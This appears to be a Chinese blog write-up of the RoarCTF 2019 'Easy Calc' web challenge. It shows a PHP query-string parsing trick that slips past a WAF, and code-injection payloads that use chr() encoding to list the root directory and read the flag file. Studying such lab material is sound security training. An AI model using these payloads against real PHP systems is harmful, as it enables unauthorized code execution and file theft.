【RoarCTF 2019】Easy Calc 1
[RoarCTF 2019]Easy Calc 1
title是一个 简单的计算器
好像是yoshino-s老师,太厉害了!!!
存在waf并且有一个calc.php界面:
|
经过测试存在字母会报错forbidden:
存在特殊字符会直接错误:
根据大佬们说的php字符串解析特性
? num=phpinfo() |
参数num前增加空格,成功输出了phpinfo()
同理,我们可以构造:
由于过滤了字母使用ascii码进行转换:
chr(47)--->/
var_dump():打印变量的相关信息
scandir():列出指定路径中的文件和目录
? num=var_dump(scandir(/)) |
即为:
? num=var_dump(scandir(chr(47))) |
打通目录,得到:
继续构造:
file_get_contents():将整个文件读入一个字符串
? num=file_get_contents(/f1agg) |
? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)) |
最终得到了flag:
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The DC_comics's World!